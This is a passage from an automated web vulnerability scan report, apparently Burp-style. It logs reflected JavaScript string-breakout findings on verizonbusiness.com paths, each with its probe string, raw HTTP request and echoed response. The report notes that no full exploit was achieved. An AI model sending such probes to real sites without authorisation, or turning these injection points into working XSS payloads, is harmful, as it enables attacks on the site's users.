The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1581'%3b14a37b19fc3 was submitted in the REST URL parameter 3. This input was echoed as d1581';14a37b19fc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/var/index.xmld1581'%3b14a37b19fc3 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41838
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/var/index.xmld1581';14a37b19fc3'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1032. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/var/index.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a12c9"%3b5205fe0e469 was submitted in the REST URL parameter 3. This input was echoed as a12c9";5205fe0e469 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/var/index.xmla12c9"%3b5205fe0e469 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:35 GMT
Content-Type: text/html
Content-Length: 41840
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/var/index.xmla12c9";5205fe0e469";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1033. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6428"%3b3a27afbcd5c was submitted in the REST URL parameter 1. This input was echoed as e6428";3a27afbcd5c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionse6428"%3b3a27afbcd5c/wholesale/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:38 GMT
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionse6428";3a27afbcd5c/wholesale/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.1034. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68250'%3bdcf2f51b446 was submitted in the REST URL parameter 1. This input was echoed as 68250';dcf2f51b446 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions68250'%3bdcf2f51b446/wholesale/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:47 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions68250';dcf2f51b446/wholesale/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1035. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8159"%3b314cbd50019 was submitted in the REST URL parameter 2. This input was echoed as a8159";314cbd50019 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesalea8159"%3b314cbd50019/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41850
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/wholesalea8159";314cbd50019/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1036. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc25d'%3bb77245645b7 was submitted in the REST URL parameter 2. This input was echoed as cc25d';b77245645b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesalecc25d'%3bb77245645b7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41852
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/wholesalecc25d';b77245645b7/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1037. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31205"%3b491529a82b2 was submitted in the REST URL parameter 1. This input was echoed as 31205";491529a82b2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions31205"%3b491529a82b2/wholesale/ips/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:51 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions31205";491529a82b2/wholesale/ips/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1038. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c40bf'%3bd88ad688d9c was submitted in the REST URL parameter 1. This input was echoed as c40bf';d88ad688d9c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsc40bf'%3bd88ad688d9c/wholesale/ips/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:04 GMT
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsc40bf';d88ad688d9c/wholesale/ips/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1039. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a6ba'%3b9102d9997e9 was submitted in the REST URL parameter 2. This input was echoed as 8a6ba';9102d9997e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale8a6ba'%3b9102d9997e9/ips/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41858
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/wholesale8a6ba';9102d9997e9/ips/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1040. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62376"%3be410552c6eb was submitted in the REST URL parameter 2. This input was echoed as 62376";e410552c6eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale62376"%3be410552c6eb/ips/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:17 GMT
Content-Type: text/html
Content-Length: 41860
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/wholesale62376";e410552c6eb/ips/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1041. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1359e"%3b0b09290ac43 was submitted in the REST URL parameter 3. This input was echoed as 1359e";0b09290ac43 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale/ips1359e"%3b0b09290ac43/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:38 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 42749
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/wholesale/ips1359e";0b09290ac43/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1042. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/ips/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5932b'%3b70e324aff24 was submitted in the REST URL parameter 3. This input was echoed as 5932b';70e324aff24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/wholesale/ips5932b'%3b70e324aff24/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:39:53 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 42747
Date: Wed, 17 Nov 2010 00:39:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/wholesale/ips5932b';70e324aff24/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1043. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/wholesale/us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a108'%3bcc97770411e was submitted in the REST URL parameter 1. This input was echoed as 8a108';cc97770411e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions8a108'%3bcc97770411e/wholesale/us/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/solutions8a108';cc97770411e/wholesale/us/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1044. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
